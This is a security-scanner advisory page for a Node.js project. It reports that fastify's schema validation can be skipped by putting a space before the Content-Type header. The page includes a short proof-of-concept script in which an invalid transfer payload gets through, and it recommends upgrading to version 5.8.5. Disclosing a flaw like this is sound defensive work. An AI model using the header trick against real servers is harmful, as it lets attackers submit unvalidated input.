Vulnerabilities

 1 via 1 paths

Dependencies

 375

Source

 GitHub

Find, fix and prevent vulnerabilities in your code.

Test and protect my applications
Severity
  • 1
Status
  • 1
  • 0
  • 0

high severity
new

Improper Validation of Specified Type of Input

  • Vulnerable module: fastify
  • Introduced through: @nestjs/platform-fastify@11.1.19

Detailed paths

  • Introduced through: nest-boilerplate@MarkNjunge/nest-boilerplate @nestjs/platform-fastify@11.1.19 fastify@5.8.4

Overview

fastify is an overhead web framework, for Node.js.

Affected versions of this package are vulnerable to Improper Validation of Specified Type of Input via the schema.body.content when a space is prepended to the Content-Type header. An attacker can bypass input validation by sending requests with a leading space in the Content-Type header, causing the body to be parsed but skipping schema validation.

Note: Even though the vulnerability was fixed in version 5.3.2, that version introduced a regression, and a new vulnerability was caused by the fix (CVE-2026-33806). To be fully protected from both the original issue, recommand to upgrade to v5.8.5.

PoC

const fastify = require('fastify')({ logger: false });

fastify.post('/transfer', {
  schema: {
    body: {
      content: {
        'application/json': {
          schema: {
            type: 'object',
            required: ['amount', 'recipient'],
            properties: {
              amount: { type: 'number', maximum: 1000 },
              recipient: { type: 'string', maxLength: 50 },
              admin: { type: 'boolean', enum: [false] }
            },
            additionalProperties: false
          }
        }
      }
    }
  }
}, async (request) => {
  return { processed: true, data: request.body };
});

(async () => {
  await fastify.ready();

  // BLOCKED — normal request with invalid payload
  const res1 = await fastify.inject({
    method: 'POST',
    url: '/transfer',
    headers: { 'content-type': 'application/json' },
    payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
  });
  console.log('Normal:', res1.statusCode);
  // → 400 FST_ERR_VALIDATION

  // BYPASS — single leading space
  const res2 = await fastify.inject({
    method: 'POST',
    url: '/transfer',
    headers: { 'content-type': ' application/json' },
    payload: JSON.stringify({ amount: 9999, recipient: 'EVIL', admin: true })
  });
  console.log('Leading space:', res2.statusCode);
  // → 200 (validation bypassed!)
  console.log('Body:', res2.body);

  await fastify.close();
})();

Remediation

Upgrade fastify to version 5.8.5 or higher.

References

Improper Validation of Specified Type of Input vulnerability report